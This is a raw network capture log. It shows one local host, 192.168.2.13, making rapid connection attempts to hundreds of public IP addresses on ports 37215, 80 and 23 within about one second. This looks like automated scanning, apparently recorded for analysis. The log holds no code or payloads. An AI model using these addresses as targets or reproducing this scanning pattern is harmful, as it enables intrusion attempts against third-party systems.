                            Jun 10, 2024 15:37:59.469141006 CEST3721530401197.206.82.162192.168.2.13
                            Jun 10, 2024 15:37:59.469156981 CEST3721530401156.217.241.17192.168.2.13
                            Jun 10, 2024 15:37:59.469180107 CEST372153040141.242.64.11192.168.2.13
                            Jun 10, 2024 15:37:59.469191074 CEST3721530401156.43.62.25192.168.2.13
                            Jun 10, 2024 15:37:59.469193935 CEST3040137215192.168.2.13156.217.241.17
                            Jun 10, 2024 15:37:59.469202995 CEST3721530401197.243.98.147192.168.2.13
                            Jun 10, 2024 15:37:59.469213009 CEST3040137215192.168.2.13197.44.169.119
                            Jun 10, 2024 15:37:59.469213009 CEST3040137215192.168.2.13197.42.122.158
                            Jun 10, 2024 15:37:59.469213009 CEST3040137215192.168.2.1341.9.224.168
                            Jun 10, 2024 15:37:59.469213009 CEST3040137215192.168.2.13197.62.20.172
                            Jun 10, 2024 15:37:59.469213009 CEST3040137215192.168.2.13197.206.82.162
                            Jun 10, 2024 15:37:59.469214916 CEST3721530401156.134.115.58192.168.2.13
                            Jun 10, 2024 15:37:59.469227076 CEST3040137215192.168.2.1341.242.64.11
                            Jun 10, 2024 15:37:59.469228029 CEST372153040141.225.138.240192.168.2.13
                            Jun 10, 2024 15:37:59.469238997 CEST3040137215192.168.2.13197.243.98.147
                            Jun 10, 2024 15:37:59.469238997 CEST3040137215192.168.2.13156.134.115.58
                            Jun 10, 2024 15:37:59.469239950 CEST372153040141.2.20.8192.168.2.13
                            Jun 10, 2024 15:37:59.469242096 CEST3040137215192.168.2.13156.43.62.25
                            Jun 10, 2024 15:37:59.469253063 CEST3721530401197.145.195.51192.168.2.13
                            Jun 10, 2024 15:37:59.469264984 CEST372153040141.246.123.169192.168.2.13
                            Jun 10, 2024 15:37:59.469276905 CEST372153040141.39.101.105192.168.2.13
                            Jun 10, 2024 15:37:59.469288111 CEST372153040141.110.26.159192.168.2.13
                            Jun 10, 2024 15:37:59.469289064 CEST3040137215192.168.2.1341.225.138.240
                            Jun 10, 2024 15:37:59.469290018 CEST3040137215192.168.2.13197.145.195.51
                            Jun 10, 2024 15:37:59.469296932 CEST3040137215192.168.2.1341.2.20.8
                            Jun 10, 2024 15:37:59.469300985 CEST3721530401156.208.214.86192.168.2.13
                            Jun 10, 2024 15:37:59.469301939 CEST3040137215192.168.2.1341.246.123.169
                            Jun 10, 2024 15:37:59.469305992 CEST3040137215192.168.2.1341.39.101.105
                            Jun 10, 2024 15:37:59.469314098 CEST3721530401156.250.200.246192.168.2.13
                            Jun 10, 2024 15:37:59.469329119 CEST3040137215192.168.2.1341.110.26.159
                            Jun 10, 2024 15:37:59.469345093 CEST3040137215192.168.2.13156.208.214.86
                            Jun 10, 2024 15:37:59.469355106 CEST3040137215192.168.2.13156.250.200.246
                            Jun 10, 2024 15:37:59.469471931 CEST372153040141.220.135.254192.168.2.13
                            Jun 10, 2024 15:37:59.469485998 CEST3721530401197.220.136.108192.168.2.13
                            Jun 10, 2024 15:37:59.469497919 CEST3721530401197.113.66.44192.168.2.13
                            Jun 10, 2024 15:37:59.469508886 CEST372153040141.6.252.117192.168.2.13
                            Jun 10, 2024 15:37:59.469512939 CEST3040137215192.168.2.1341.220.135.254
                            Jun 10, 2024 15:37:59.469520092 CEST3040137215192.168.2.13197.220.136.108
                            Jun 10, 2024 15:37:59.469522953 CEST372153040141.21.117.201192.168.2.13
                            Jun 10, 2024 15:37:59.469532967 CEST3040137215192.168.2.13197.113.66.44
                            Jun 10, 2024 15:37:59.469536066 CEST3721530401156.226.26.205192.168.2.13
                            Jun 10, 2024 15:37:59.469543934 CEST3040137215192.168.2.1341.6.252.117
                            Jun 10, 2024 15:37:59.469547987 CEST372153040141.79.219.224192.168.2.13
                            Jun 10, 2024 15:37:59.469553947 CEST3040137215192.168.2.1341.21.117.201
                            Jun 10, 2024 15:37:59.469559908 CEST372153040141.186.201.232192.168.2.13
                            Jun 10, 2024 15:37:59.469572067 CEST372153040141.184.176.92192.168.2.13
                            Jun 10, 2024 15:37:59.469575882 CEST3040137215192.168.2.13156.226.26.205
                            Jun 10, 2024 15:37:59.469580889 CEST3040137215192.168.2.1341.79.219.224
                            Jun 10, 2024 15:37:59.469583988 CEST3721530401197.11.200.238192.168.2.13
                            Jun 10, 2024 15:37:59.469598055 CEST372153040141.62.96.6192.168.2.13
                            Jun 10, 2024 15:37:59.469600916 CEST3040137215192.168.2.1341.186.201.232
                            Jun 10, 2024 15:37:59.469609976 CEST3040137215192.168.2.1341.184.176.92
                            Jun 10, 2024 15:37:59.469609976 CEST3721530401156.216.138.93192.168.2.13
                            Jun 10, 2024 15:37:59.469621897 CEST3721530401197.47.174.199192.168.2.13
                            Jun 10, 2024 15:37:59.469626904 CEST3040137215192.168.2.13197.11.200.238
                            Jun 10, 2024 15:37:59.469635010 CEST3040137215192.168.2.1341.62.96.6
                            Jun 10, 2024 15:37:59.469646931 CEST3721530401197.75.161.139192.168.2.13
                            Jun 10, 2024 15:37:59.469646931 CEST3040137215192.168.2.13156.216.138.93
                            Jun 10, 2024 15:37:59.469654083 CEST3040137215192.168.2.13197.47.174.199
                            Jun 10, 2024 15:37:59.469660044 CEST3721530401197.1.253.34192.168.2.13
                            Jun 10, 2024 15:37:59.469672918 CEST372153040141.255.237.62192.168.2.13
                            Jun 10, 2024 15:37:59.469683886 CEST372153040141.215.225.158192.168.2.13
                            Jun 10, 2024 15:37:59.469691038 CEST3040137215192.168.2.13197.75.161.139
                            Jun 10, 2024 15:37:59.469692945 CEST3040137215192.168.2.13197.1.253.34
                            Jun 10, 2024 15:37:59.469696045 CEST3721530401197.246.240.193192.168.2.13
                            Jun 10, 2024 15:37:59.469697952 CEST3040137215192.168.2.1341.255.237.62
                            Jun 10, 2024 15:37:59.469707966 CEST3721530401197.17.187.161192.168.2.13
                            Jun 10, 2024 15:37:59.469712019 CEST3040137215192.168.2.1341.215.225.158
                            Jun 10, 2024 15:37:59.469721079 CEST372153040141.89.242.81192.168.2.13
                            Jun 10, 2024 15:37:59.469732046 CEST3040137215192.168.2.13197.246.240.193
                            Jun 10, 2024 15:37:59.469733000 CEST3721530401197.9.78.250192.168.2.13
                            Jun 10, 2024 15:37:59.469741106 CEST3040137215192.168.2.13197.17.187.161
                            Jun 10, 2024 15:37:59.469746113 CEST3721530401197.132.215.10192.168.2.13
                            Jun 10, 2024 15:37:59.469758034 CEST3721530401197.184.146.210192.168.2.13
                            Jun 10, 2024 15:37:59.469763041 CEST3040137215192.168.2.13197.9.78.250
                            Jun 10, 2024 15:37:59.469763994 CEST3040137215192.168.2.1341.89.242.81
                            Jun 10, 2024 15:37:59.469769955 CEST3721530401197.130.105.244192.168.2.13
                            Jun 10, 2024 15:37:59.469782114 CEST3721530401197.199.212.19192.168.2.13
                            Jun 10, 2024 15:37:59.469784021 CEST3040137215192.168.2.13197.132.215.10
                            Jun 10, 2024 15:37:59.469784021 CEST3040137215192.168.2.13197.184.146.210
                            Jun 10, 2024 15:37:59.469794035 CEST3721530401156.225.131.99192.168.2.13
                            Jun 10, 2024 15:37:59.469805956 CEST3040137215192.168.2.13197.130.105.244
                            Jun 10, 2024 15:37:59.469805956 CEST3721530401156.199.231.208192.168.2.13
                            Jun 10, 2024 15:37:59.469815969 CEST3040137215192.168.2.13197.199.212.19
                            Jun 10, 2024 15:37:59.469819069 CEST372153040141.33.240.142192.168.2.13
                            Jun 10, 2024 15:37:59.469827890 CEST3040137215192.168.2.13156.225.131.99
                            Jun 10, 2024 15:37:59.469844103 CEST3040137215192.168.2.13156.199.231.208
                            Jun 10, 2024 15:37:59.469849110 CEST3040137215192.168.2.1341.33.240.142
                            Jun 10, 2024 15:37:59.469871998 CEST3786280192.168.2.13203.54.242.166
                            Jun 10, 2024 15:37:59.470227957 CEST3721530401156.196.251.48192.168.2.13
                            Jun 10, 2024 15:37:59.470269918 CEST3040137215192.168.2.13156.196.251.48
                            Jun 10, 2024 15:37:59.470276117 CEST3721530401197.199.46.195192.168.2.13
                            Jun 10, 2024 15:37:59.470288992 CEST3721530401197.13.135.98192.168.2.13
                            Jun 10, 2024 15:37:59.470300913 CEST372153040141.203.183.193192.168.2.13
                            Jun 10, 2024 15:37:59.470315933 CEST3721530401197.202.166.92192.168.2.13
                            Jun 10, 2024 15:37:59.470319033 CEST3040137215192.168.2.13197.199.46.195
                            Jun 10, 2024 15:37:59.470326900 CEST3040137215192.168.2.13197.13.135.98
                            Jun 10, 2024 15:37:59.470326900 CEST3040137215192.168.2.1341.203.183.193
                            Jun 10, 2024 15:37:59.470329046 CEST3721530401197.180.196.61192.168.2.13
                            Jun 10, 2024 15:37:59.470341921 CEST3721530401156.178.146.228192.168.2.13
                            Jun 10, 2024 15:37:59.470347881 CEST3040137215192.168.2.13197.202.166.92
                            Jun 10, 2024 15:37:59.470354080 CEST372153040141.91.24.63192.168.2.13
                            Jun 10, 2024 15:37:59.470366001 CEST3721530401197.11.184.139192.168.2.13
                            Jun 10, 2024 15:37:59.470366955 CEST3040137215192.168.2.13197.180.196.61
                            Jun 10, 2024 15:37:59.470376015 CEST3040137215192.168.2.13156.178.146.228
                            Jun 10, 2024 15:37:59.470377922 CEST3721530401156.98.7.218192.168.2.13
                            Jun 10, 2024 15:37:59.470390081 CEST372153040141.161.142.37192.168.2.13
                            Jun 10, 2024 15:37:59.470391035 CEST3040137215192.168.2.1341.91.24.63
                            Jun 10, 2024 15:37:59.470402002 CEST372153040141.127.147.43192.168.2.13
                            Jun 10, 2024 15:37:59.470403910 CEST3040137215192.168.2.13197.11.184.139
                            Jun 10, 2024 15:37:59.470413923 CEST3040137215192.168.2.13156.98.7.218
                            Jun 10, 2024 15:37:59.470413923 CEST372153040141.250.248.31192.168.2.13
                            Jun 10, 2024 15:37:59.470423937 CEST3040137215192.168.2.1341.161.142.37
                            Jun 10, 2024 15:37:59.470427036 CEST3721530401156.141.255.227192.168.2.13
                            Jun 10, 2024 15:37:59.470438957 CEST3040137215192.168.2.1341.127.147.43
                            Jun 10, 2024 15:37:59.470451117 CEST236005818.181.89.22192.168.2.13
                            Jun 10, 2024 15:37:59.470451117 CEST3040137215192.168.2.1341.250.248.31
                            Jun 10, 2024 15:37:59.470453978 CEST3040137215192.168.2.13156.141.255.227
                            Jun 10, 2024 15:37:59.470463991 CEST3721530401156.71.112.138192.168.2.13
                            Jun 10, 2024 15:37:59.470477104 CEST372153040141.150.239.92192.168.2.13
                            Jun 10, 2024 15:37:59.470489025 CEST372153040141.122.223.54192.168.2.13
                            Jun 10, 2024 15:37:59.470489979 CEST6005823192.168.2.1318.181.89.22
                            Jun 10, 2024 15:37:59.470498085 CEST3040137215192.168.2.13156.71.112.138
                            Jun 10, 2024 15:37:59.470501900 CEST372153040141.177.203.192192.168.2.13
                            Jun 10, 2024 15:37:59.470508099 CEST3040137215192.168.2.1341.150.239.92
                            Jun 10, 2024 15:37:59.470515013 CEST372153040141.132.45.190192.168.2.13
                            Jun 10, 2024 15:37:59.470525026 CEST3040137215192.168.2.1341.122.223.54
                            Jun 10, 2024 15:37:59.470526934 CEST3721530401156.6.49.188192.168.2.13
                            Jun 10, 2024 15:37:59.470539093 CEST3040137215192.168.2.1341.177.203.192
                            Jun 10, 2024 15:37:59.470539093 CEST3721530401197.62.96.54192.168.2.13
                            Jun 10, 2024 15:37:59.470551968 CEST3721530401156.43.7.47192.168.2.13
                            Jun 10, 2024 15:37:59.470554113 CEST3040137215192.168.2.1341.132.45.190
                            Jun 10, 2024 15:37:59.470565081 CEST3721530401197.143.115.183192.168.2.13
                            Jun 10, 2024 15:37:59.470567942 CEST3040137215192.168.2.13156.6.49.188
                            Jun 10, 2024 15:37:59.470577002 CEST3721530401156.58.68.98192.168.2.13
                            Jun 10, 2024 15:37:59.470586061 CEST3040137215192.168.2.13156.43.7.47
                            Jun 10, 2024 15:37:59.470587969 CEST3721530401197.2.192.34192.168.2.13
                            Jun 10, 2024 15:37:59.470599890 CEST3721530401197.104.71.105192.168.2.13
                            Jun 10, 2024 15:37:59.470607996 CEST3040137215192.168.2.13156.58.68.98
                            Jun 10, 2024 15:37:59.470628977 CEST3040137215192.168.2.13197.143.115.183
                            Jun 10, 2024 15:37:59.470635891 CEST3040137215192.168.2.13197.62.96.54
                            Jun 10, 2024 15:37:59.470643044 CEST3040137215192.168.2.13197.104.71.105
                            Jun 10, 2024 15:37:59.470643044 CEST3040137215192.168.2.13197.2.192.34
                            Jun 10, 2024 15:37:59.471035004 CEST3721530401156.182.169.40192.168.2.13
                            Jun 10, 2024 15:37:59.471059084 CEST3721530401197.224.180.132192.168.2.13
                            Jun 10, 2024 15:37:59.471071959 CEST372153040141.56.135.119192.168.2.13
                            Jun 10, 2024 15:37:59.471076965 CEST3040137215192.168.2.13156.182.169.40
                            Jun 10, 2024 15:37:59.471088886 CEST3040137215192.168.2.13197.224.180.132
                            Jun 10, 2024 15:37:59.471088886 CEST372153040141.242.31.92192.168.2.13
                            Jun 10, 2024 15:37:59.471101999 CEST372153040141.61.206.36192.168.2.13
                            Jun 10, 2024 15:37:59.471112013 CEST3040137215192.168.2.1341.56.135.119
                            Jun 10, 2024 15:37:59.471113920 CEST3721530401197.168.50.142192.168.2.13
                            Jun 10, 2024 15:37:59.471124887 CEST3040137215192.168.2.1341.242.31.92
                            Jun 10, 2024 15:37:59.471126080 CEST372153040141.240.113.150192.168.2.13
                            Jun 10, 2024 15:37:59.471138954 CEST3721530401197.50.184.23192.168.2.13
                            Jun 10, 2024 15:37:59.471148968 CEST3040137215192.168.2.1341.61.206.36
                            Jun 10, 2024 15:37:59.471148968 CEST3040137215192.168.2.13197.168.50.142
                            Jun 10, 2024 15:37:59.471151114 CEST3721530401156.216.202.70192.168.2.13
                            Jun 10, 2024 15:37:59.471163988 CEST3721530401197.167.23.140192.168.2.13
                            Jun 10, 2024 15:37:59.471164942 CEST3040137215192.168.2.1341.240.113.150
                            Jun 10, 2024 15:37:59.471164942 CEST3040137215192.168.2.13197.50.184.23
                            Jun 10, 2024 15:37:59.471174955 CEST3040137215192.168.2.13156.216.202.70
                            Jun 10, 2024 15:37:59.471175909 CEST3721530401197.7.79.198192.168.2.13
                            Jun 10, 2024 15:37:59.471189976 CEST372153040141.14.134.213192.168.2.13
                            Jun 10, 2024 15:37:59.471198082 CEST3040137215192.168.2.13197.167.23.140
                            Jun 10, 2024 15:37:59.471200943 CEST3721530401197.73.113.32192.168.2.13
                            Jun 10, 2024 15:37:59.471206903 CEST3040137215192.168.2.13197.7.79.198
                            Jun 10, 2024 15:37:59.471214056 CEST372153040141.65.43.27192.168.2.13
                            Jun 10, 2024 15:37:59.471225977 CEST3721530401197.72.226.112192.168.2.13
                            Jun 10, 2024 15:37:59.471231937 CEST3040137215192.168.2.13197.73.113.32
                            Jun 10, 2024 15:37:59.471236944 CEST3721530401197.65.112.200192.168.2.13
                            Jun 10, 2024 15:37:59.471242905 CEST3040137215192.168.2.1341.14.134.213
                            Jun 10, 2024 15:37:59.471247911 CEST3040137215192.168.2.1341.65.43.27
                            Jun 10, 2024 15:37:59.471261024 CEST3040137215192.168.2.13197.65.112.200
                            Jun 10, 2024 15:37:59.471261978 CEST372153040141.126.198.181192.168.2.13
                            Jun 10, 2024 15:37:59.471261978 CEST3040137215192.168.2.13197.72.226.112
                            Jun 10, 2024 15:37:59.471275091 CEST372153040141.216.45.208192.168.2.13
                            Jun 10, 2024 15:37:59.471286058 CEST3721530401156.6.131.199192.168.2.13
                            Jun 10, 2024 15:37:59.471296072 CEST3040137215192.168.2.1341.126.198.181
                            Jun 10, 2024 15:37:59.471297979 CEST3721530401197.243.159.59192.168.2.13
                            Jun 10, 2024 15:37:59.471309900 CEST3040137215192.168.2.1341.216.45.208
                            Jun 10, 2024 15:37:59.471312046 CEST3721530401156.5.176.252192.168.2.13
                            Jun 10, 2024 15:37:59.471318007 CEST3040137215192.168.2.13156.6.131.199
                            Jun 10, 2024 15:37:59.471324921 CEST372153040141.14.251.141192.168.2.13
                            Jun 10, 2024 15:37:59.471332073 CEST3040137215192.168.2.13197.243.159.59
                            Jun 10, 2024 15:37:59.471338034 CEST372153040141.117.120.124192.168.2.13
                            Jun 10, 2024 15:37:59.471347094 CEST3040137215192.168.2.13156.5.176.252
                            Jun 10, 2024 15:37:59.471349955 CEST372153040141.22.121.144192.168.2.13
                            Jun 10, 2024 15:37:59.471357107 CEST3040137215192.168.2.1341.14.251.141
                            Jun 10, 2024 15:37:59.471360922 CEST3721530401197.131.81.43192.168.2.13
                            Jun 10, 2024 15:37:59.471374035 CEST3721530401156.26.209.75192.168.2.13
                            Jun 10, 2024 15:37:59.471374035 CEST3040137215192.168.2.1341.117.120.124
                            Jun 10, 2024 15:37:59.471374035 CEST3040137215192.168.2.1341.22.121.144
                            Jun 10, 2024 15:37:59.471385956 CEST372153040141.23.78.65192.168.2.13
                            Jun 10, 2024 15:37:59.471398115 CEST3721530401197.215.195.191192.168.2.13
                            Jun 10, 2024 15:37:59.471411943 CEST3040137215192.168.2.13197.131.81.43
                            Jun 10, 2024 15:37:59.471415997 CEST3040137215192.168.2.13156.26.209.75
                            Jun 10, 2024 15:37:59.471416950 CEST3040137215192.168.2.1341.23.78.65
                            Jun 10, 2024 15:37:59.471487045 CEST3040137215192.168.2.13197.215.195.191
                            Jun 10, 2024 15:37:59.471574068 CEST3721530401156.168.9.140192.168.2.13
                            Jun 10, 2024 15:37:59.471599102 CEST3721530401156.68.38.250192.168.2.13
                            Jun 10, 2024 15:37:59.471605062 CEST3040137215192.168.2.13156.168.9.140
                            Jun 10, 2024 15:37:59.471613884 CEST3721530401197.120.117.53192.168.2.13
                            Jun 10, 2024 15:37:59.471626997 CEST372153040141.80.129.143192.168.2.13
                            Jun 10, 2024 15:37:59.471637011 CEST3040137215192.168.2.13156.68.38.250
                            Jun 10, 2024 15:37:59.471647978 CEST3040137215192.168.2.13197.120.117.53
                            Jun 10, 2024 15:37:59.471659899 CEST3040137215192.168.2.1341.80.129.143
                            Jun 10, 2024 15:37:59.471760988 CEST3721530401156.176.122.75192.168.2.13
                            Jun 10, 2024 15:37:59.471772909 CEST80168332.100.121.174192.168.2.13
                            Jun 10, 2024 15:37:59.471785069 CEST3721530401156.87.251.128192.168.2.13
                            Jun 10, 2024 15:37:59.471796989 CEST8016833166.187.155.48192.168.2.13
                            Jun 10, 2024 15:37:59.471806049 CEST3040137215192.168.2.13156.176.122.75
                            Jun 10, 2024 15:37:59.471807003 CEST1683380192.168.2.132.100.121.174
                            Jun 10, 2024 15:37:59.471808910 CEST3721530401197.233.55.216192.168.2.13
                            Jun 10, 2024 15:37:59.471815109 CEST3040137215192.168.2.13156.87.251.128
                            Jun 10, 2024 15:37:59.471822023 CEST8016833164.56.42.141192.168.2.13
                            Jun 10, 2024 15:37:59.471828938 CEST1683380192.168.2.13166.187.155.48
                            Jun 10, 2024 15:37:59.471834898 CEST8016833118.169.27.116192.168.2.13
                            Jun 10, 2024 15:37:59.471847057 CEST3721530401197.32.219.223192.168.2.13
                            Jun 10, 2024 15:37:59.471847057 CEST3040137215192.168.2.13197.233.55.216
                            Jun 10, 2024 15:37:59.471858025 CEST3721530401197.187.28.60192.168.2.13
                            Jun 10, 2024 15:37:59.471860886 CEST1683380192.168.2.13164.56.42.141
                            Jun 10, 2024 15:37:59.471869946 CEST8016833121.64.98.238192.168.2.13
                            Jun 10, 2024 15:37:59.471882105 CEST8016833156.100.89.106192.168.2.13
                            Jun 10, 2024 15:37:59.471904993 CEST372153040141.177.170.150192.168.2.13
                            Jun 10, 2024 15:37:59.471911907 CEST1683380192.168.2.13118.169.27.116
                            Jun 10, 2024 15:37:59.471915007 CEST3040137215192.168.2.13197.32.219.223
                            Jun 10, 2024 15:37:59.471915007 CEST3040137215192.168.2.13197.187.28.60
                            Jun 10, 2024 15:37:59.471915007 CEST1683380192.168.2.13121.64.98.238
                            Jun 10, 2024 15:37:59.471916914 CEST801683388.193.43.217192.168.2.13
                            Jun 10, 2024 15:37:59.471920013 CEST1683380192.168.2.13156.100.89.106
                            Jun 10, 2024 15:37:59.471930027 CEST801683320.140.80.154192.168.2.13
                            Jun 10, 2024 15:37:59.471940994 CEST3040137215192.168.2.1341.177.170.150
                            Jun 10, 2024 15:37:59.471940994 CEST372153040141.4.129.122192.168.2.13
                            Jun 10, 2024 15:37:59.471947908 CEST1683380192.168.2.1388.193.43.217
                            Jun 10, 2024 15:37:59.471954107 CEST801683314.188.180.137192.168.2.13
                            Jun 10, 2024 15:37:59.471966982 CEST3721530401197.255.9.221192.168.2.13
                            Jun 10, 2024 15:37:59.471975088 CEST1683380192.168.2.1320.140.80.154
                            Jun 10, 2024 15:37:59.471977949 CEST3721530401156.94.166.164192.168.2.13
                            Jun 10, 2024 15:37:59.471981049 CEST3040137215192.168.2.1341.4.129.122
                            Jun 10, 2024 15:37:59.471990108 CEST3721530401156.182.228.7192.168.2.13
                            Jun 10, 2024 15:37:59.471992016 CEST1683380192.168.2.1314.188.180.137
                            Jun 10, 2024 15:37:59.472002029 CEST372153040141.176.169.70192.168.2.13
                            Jun 10, 2024 15:37:59.472002983 CEST3040137215192.168.2.13197.255.9.221
                            Jun 10, 2024 15:37:59.472007990 CEST3040137215192.168.2.13156.94.166.164
                            Jun 10, 2024 15:37:59.472014904 CEST8016833217.46.221.207192.168.2.13
                            Jun 10, 2024 15:37:59.472019911 CEST3040137215192.168.2.13156.182.228.7
                            Jun 10, 2024 15:37:59.472027063 CEST3721530401156.161.72.131192.168.2.13
                            Jun 10, 2024 15:37:59.472038984 CEST3721530401156.128.96.57192.168.2.13
                            Jun 10, 2024 15:37:59.472048044 CEST1683380192.168.2.13217.46.221.207
                            Jun 10, 2024 15:37:59.472049952 CEST372153040141.137.88.51192.168.2.13
                            Jun 10, 2024 15:37:59.472074986 CEST3040137215192.168.2.13156.128.96.57
                            Jun 10, 2024 15:37:59.472081900 CEST3040137215192.168.2.1341.137.88.51
                            Jun 10, 2024 15:37:59.472086906 CEST3040137215192.168.2.1341.176.169.70
                            Jun 10, 2024 15:37:59.472090960 CEST3040137215192.168.2.13156.161.72.131
                            Jun 10, 2024 15:37:59.472093105 CEST6088237215192.168.2.1341.1.16.245
                            Jun 10, 2024 15:37:59.472253084 CEST3721530401197.225.227.184192.168.2.13
                            Jun 10, 2024 15:37:59.472265959 CEST3721530401156.144.108.105192.168.2.13
                            Jun 10, 2024 15:37:59.472278118 CEST3721530401156.29.226.172192.168.2.13
                            Jun 10, 2024 15:37:59.472291946 CEST3040137215192.168.2.13197.225.227.184
                            Jun 10, 2024 15:37:59.472291946 CEST3040137215192.168.2.13156.144.108.105
                            Jun 10, 2024 15:37:59.472301006 CEST801683364.252.118.141192.168.2.13
                            Jun 10, 2024 15:37:59.472311020 CEST3040137215192.168.2.13156.29.226.172
                            Jun 10, 2024 15:37:59.472313881 CEST3721530401197.208.92.77192.168.2.13
                            Jun 10, 2024 15:37:59.472326040 CEST8016833192.4.60.49192.168.2.13
                            Jun 10, 2024 15:37:59.472337008 CEST1683380192.168.2.1364.252.118.141
                            Jun 10, 2024 15:37:59.472337961 CEST8016833101.201.43.179192.168.2.13
                            Jun 10, 2024 15:37:59.472352028 CEST8016833182.143.50.226192.168.2.13
                            Jun 10, 2024 15:37:59.472352028 CEST3040137215192.168.2.13197.208.92.77
                            Jun 10, 2024 15:37:59.472364902 CEST1683380192.168.2.13192.4.60.49
                            Jun 10, 2024 15:37:59.472364902 CEST1683380192.168.2.13101.201.43.179
                            Jun 10, 2024 15:37:59.472366095 CEST372153040141.103.200.147192.168.2.13
                            Jun 10, 2024 15:37:59.472378969 CEST3721530401197.117.75.155192.168.2.13
                            Jun 10, 2024 15:37:59.472385883 CEST1683380192.168.2.13182.143.50.226
                            Jun 10, 2024 15:37:59.472390890 CEST372153040141.88.237.147192.168.2.13
                            Jun 10, 2024 15:37:59.472397089 CEST3040137215192.168.2.1341.103.200.147
                            Jun 10, 2024 15:37:59.472403049 CEST372153040141.125.23.167192.168.2.13
                            Jun 10, 2024 15:37:59.472415924 CEST3040137215192.168.2.13197.117.75.155
                            Jun 10, 2024 15:37:59.472415924 CEST801683349.64.20.72192.168.2.13
                            Jun 10, 2024 15:37:59.472419024 CEST3040137215192.168.2.1341.88.237.147
                            Jun 10, 2024 15:37:59.472428083 CEST8016833183.26.223.73192.168.2.13
                            Jun 10, 2024 15:37:59.472435951 CEST3040137215192.168.2.1341.125.23.167
                            Jun 10, 2024 15:37:59.472439051 CEST3721530401156.133.17.150192.168.2.13
                            Jun 10, 2024 15:37:59.472449064 CEST1683380192.168.2.1349.64.20.72
                            Jun 10, 2024 15:37:59.472450972 CEST372153040141.92.7.216192.168.2.13
                            Jun 10, 2024 15:37:59.472461939 CEST3721530401197.249.37.1192.168.2.13
                            Jun 10, 2024 15:37:59.472465992 CEST1683380192.168.2.13183.26.223.73
                            Jun 10, 2024 15:37:59.472485065 CEST3040137215192.168.2.1341.92.7.216
                            Jun 10, 2024 15:37:59.472492933 CEST3040137215192.168.2.13197.249.37.1
                            Jun 10, 2024 15:37:59.472497940 CEST8016833198.58.93.15192.168.2.13
                            Jun 10, 2024 15:37:59.472511053 CEST3040137215192.168.2.13156.133.17.150
                            Jun 10, 2024 15:37:59.472511053 CEST801683392.81.126.145192.168.2.13
                            Jun 10, 2024 15:37:59.472523928 CEST8016833153.240.121.133192.168.2.13
                            Jun 10, 2024 15:37:59.472532034 CEST1683380192.168.2.13198.58.93.15
                            Jun 10, 2024 15:37:59.472534895 CEST3721530401197.172.226.233192.168.2.13
                            Jun 10, 2024 15:37:59.472539902 CEST1683380192.168.2.1392.81.126.145
                            Jun 10, 2024 15:37:59.472547054 CEST80168338.180.244.27192.168.2.13
                            Jun 10, 2024 15:37:59.472559929 CEST801683396.202.192.87192.168.2.13
                            Jun 10, 2024 15:37:59.472570896 CEST3721530401156.183.150.41192.168.2.13
                            Jun 10, 2024 15:37:59.472579002 CEST1683380192.168.2.138.180.244.27
                            Jun 10, 2024 15:37:59.472583055 CEST801683352.143.255.163192.168.2.13
                            Jun 10, 2024 15:37:59.472594976 CEST801683358.105.170.122192.168.2.13
                            Jun 10, 2024 15:37:59.472595930 CEST1683380192.168.2.1396.202.192.87
                            Jun 10, 2024 15:37:59.472603083 CEST3040137215192.168.2.13156.183.150.41
                            Jun 10, 2024 15:37:59.472606897 CEST801683389.145.214.210192.168.2.13
                            Jun 10, 2024 15:37:59.472615957 CEST1683380192.168.2.1352.143.255.163
                            Jun 10, 2024 15:37:59.472618103 CEST1683380192.168.2.13153.240.121.133
                            Jun 10, 2024 15:37:59.472619057 CEST8016833175.220.177.145192.168.2.13
                            Jun 10, 2024 15:37:59.472623110 CEST3040137215192.168.2.13197.172.226.233
                            Jun 10, 2024 15:37:59.472635984 CEST1683380192.168.2.1358.105.170.122
                            Jun 10, 2024 15:37:59.472656012 CEST1683380192.168.2.1389.145.214.210
                            Jun 10, 2024 15:37:59.472664118 CEST1683380192.168.2.13175.220.177.145
                            Jun 10, 2024 15:37:59.472872972 CEST372153040141.229.165.243192.168.2.13
                            Jun 10, 2024 15:37:59.472897053 CEST801683363.223.27.64192.168.2.13
                            Jun 10, 2024 15:37:59.472908020 CEST801683346.124.133.59192.168.2.13
                            Jun 10, 2024 15:37:59.472929955 CEST1683380192.168.2.1363.223.27.64
                            Jun 10, 2024 15:37:59.472930908 CEST3040137215192.168.2.1341.229.165.243
                            Jun 10, 2024 15:37:59.472934008 CEST1683380192.168.2.1346.124.133.59
                            Jun 10, 2024 15:37:59.472934008 CEST3721530401197.185.118.210192.168.2.13
                            Jun 10, 2024 15:37:59.472948074 CEST8016833160.158.220.221192.168.2.13
                            Jun 10, 2024 15:37:59.472959995 CEST801683374.221.113.140192.168.2.13
                            Jun 10, 2024 15:37:59.472970009 CEST3040137215192.168.2.13197.185.118.210
                            Jun 10, 2024 15:37:59.472971916 CEST3721530401156.87.128.213192.168.2.13
                            Jun 10, 2024 15:37:59.472984076 CEST8016833220.219.206.99192.168.2.13
                            Jun 10, 2024 15:37:59.472985029 CEST1683380192.168.2.13160.158.220.221
                            Jun 10, 2024 15:37:59.472991943 CEST1683380192.168.2.1374.221.113.140
                            Jun 10, 2024 15:37:59.472995996 CEST8016833154.68.192.29192.168.2.13
                            Jun 10, 2024 15:37:59.473006010 CEST3040137215192.168.2.13156.87.128.213
                            Jun 10, 2024 15:37:59.473009109 CEST8016833184.225.110.223192.168.2.13
                            Jun 10, 2024 15:37:59.473021030 CEST801683339.251.150.235192.168.2.13
                            Jun 10, 2024 15:37:59.473021030 CEST1683380192.168.2.13220.219.206.99
                            Jun 10, 2024 15:37:59.473033905 CEST801683337.242.196.25192.168.2.13
                            Jun 10, 2024 15:37:59.473037004 CEST1683380192.168.2.13154.68.192.29
                            Jun 10, 2024 15:37:59.473037004 CEST1683380192.168.2.13184.225.110.223
                            Jun 10, 2024 15:37:59.473047018 CEST3721530401156.74.148.193192.168.2.13
                            Jun 10, 2024 15:37:59.473057032 CEST1683380192.168.2.1339.251.150.235
                            Jun 10, 2024 15:37:59.473058939 CEST8016833219.24.143.221192.168.2.13
                            Jun 10, 2024 15:37:59.473071098 CEST372153040141.11.218.91192.168.2.13
                            Jun 10, 2024 15:37:59.473072052 CEST1683380192.168.2.1337.242.196.25
                            Jun 10, 2024 15:37:59.473083019 CEST3721530401197.169.37.32192.168.2.13
                            Jun 10, 2024 15:37:59.473086119 CEST3040137215192.168.2.13156.74.148.193
                            Jun 10, 2024 15:37:59.473090887 CEST1683380192.168.2.13219.24.143.221
                            Jun 10, 2024 15:37:59.473107100 CEST801683320.163.218.116192.168.2.13
                            Jun 10, 2024 15:37:59.473107100 CEST3040137215192.168.2.1341.11.218.91
